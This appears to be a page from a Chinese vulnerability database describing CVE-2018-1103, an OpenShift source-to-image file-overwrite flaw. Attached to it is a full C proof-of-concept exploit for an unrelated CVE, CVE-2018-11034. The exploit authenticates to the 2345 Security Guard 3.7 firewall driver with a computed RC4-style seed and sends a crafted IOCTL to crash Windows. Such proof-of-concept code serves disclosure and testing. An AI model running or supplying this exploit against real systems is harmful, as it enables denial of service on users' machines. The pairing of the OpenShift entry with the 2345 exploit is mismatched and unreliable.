CVE-2018-1103
CVSSN/A
发布时间 :2018-06-12 11:29:00
修订时间 :2018-06-12 11:29:00
NMP    

[原文]Openshift Enterprise source-to-image before version 1.1.10 is vulnerable to an improper validation of user input. An attacker who could trick a user into using the command to copy files locally, from a pod, could override files outside of the target directory of the command.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1103
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1103
(官方数据源) NVD

- 其它链接及资源

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1103
(UNKNOWN)  CONFIRM  https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1103

- 漏洞信息 (F147609)

2345 Security Guard 3.7 2345NsProtect.sys Denial Of Service (PacketStormID:F147609)
2018-05-15 00:00:00
anhkgg  
exploit,denial of service
CVE-2018-11034
[点击下载]

2345 Security Guard version 3.7 suffers from a denial of service vulnerability related to 2345NsProtect.sys.

# Exploit Title: [BSOD  by IOCTL 0x8000200D in 2345NsProtect.sys  of 2345 Security Guard 3.7]
# Date: [20180513]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 11034]
 
#include <windows.h>
#include <stdio.h>
 
struct NETFW_IOCTL_ADD_PID
{
    DWORD pid;
    char seed[0x14];//
};//0x18
 
struct NETFW_IOCTL_SET_PID
{
    BYTE set_state;// 
    BYTE unk;//1
    WORD buf_len;//2
    DWORD pid;//4
    char buf[0x64];//8
};//6c
 
struct NETFW_IOCTL_222040
{
    DWORD* ptr;
    DWORD size;
};//
 
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
    int result; 
 
    *a1 ^= *a2;
    *a2 ^= *a1;
    result = (unsigned __int8)*a2;
    *a1 ^= result;
    return result;
}
 
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
    int result;
    unsigned __int8 v4;
    __int16 i;
    __int16 j;
    unsigned __int8 k; 
 
    for ( i = 0; i < 256; ++i )
        a3[i] = i;
    a3[256] = 0;
    a3[257] = 0;
    k = 0;
    v4 = 0;
    result = 0;
    for ( j = 0; j < 256; ++j )
    {
        v4 += a3[j] + a1[k];
        f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
        result = (k + 1) / len;
        k = (k + 1) % len;
    }
    return result;
}
 
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
    char *result;
    __int16 i; 
    unsigned __int8 v5; 
    unsigned __int8 v6;
 
    v5 = a3[256];
    v6 = a3[257];
    for ( i = 0; i < len; ++i )
    {
        v6 += a3[++v5];
        f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
        a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
    }
    a3[256] = v5;
    result = a3;
    a3[257] = v6;
    return result;
}
 
void calc_seed(char* seed, char* dst)
{
    char Source1[26] = {0};
    char a3[300] = {0};
 
    Source1[0] = 8;
    Source1[1] = 14;
    Source1[2] = 8;
    Source1[3] = 10;
    Source1[4] = 2;
    Source1[5] = 3;
    Source1[6] = 29;
    Source1[7] = 23;
    Source1[8] = 13;
    Source1[9] = 3;
    Source1[10] = 15;
    Source1[11] = 22;
    Source1[12] = 15;
    Source1[13] = 7;
    Source1[14] = 91;
    Source1[15] = 4;
    Source1[16] = 18;
    Source1[17] = 26;
    Source1[18] = 26;
    Source1[19] = 3;
    Source1[20] = 4;
    Source1[21] = 1;
    Source1[22] = 15;
    Source1[23] = 25;
    Source1[24] = 10;
    Source1[25] = 13;
 
    sub_12A80(seed, 0x14, a3);             
    sub_12B60(Source1, 0x1A, a3);
    memcpy(dst, Source1, 26);
}
 
int poc_2345NetFirewall()
{
    HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
        GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(h == INVALID_HANDLE_VALUE) {
        printf("[-] Open device error: %d\n", GetLastError());
        return 1;
    }
    DWORD BytesReturned = 0;
 
    DWORD ctlcode = 0x222298;
    NETFW_IOCTL_ADD_PID add_pid = {0};
    add_pid.pid = GetCurrentProcessId();
 
    if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    ctlcode = 0x2222A4;
    NETFW_IOCTL_SET_PID set_pid = {0};
    set_pid.pid = GetCurrentProcessId();
    set_pid.set_state = 1;
 
    calc_seed(add_pid.seed, set_pid.buf);
    set_pid.buf_len = 26;
 
    if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    //BSOD
    ctlcode = 0x222040;
    NETFW_IOCTL_222040 buf_222040 = {0};
    buf_222040.size = 1;
    buf_222040.ptr = (DWORD*)0x80000000;
    if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    return 0;
}
 
int main()
{
    poc_2345NetFirewall();
         
    return 0;
}

    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站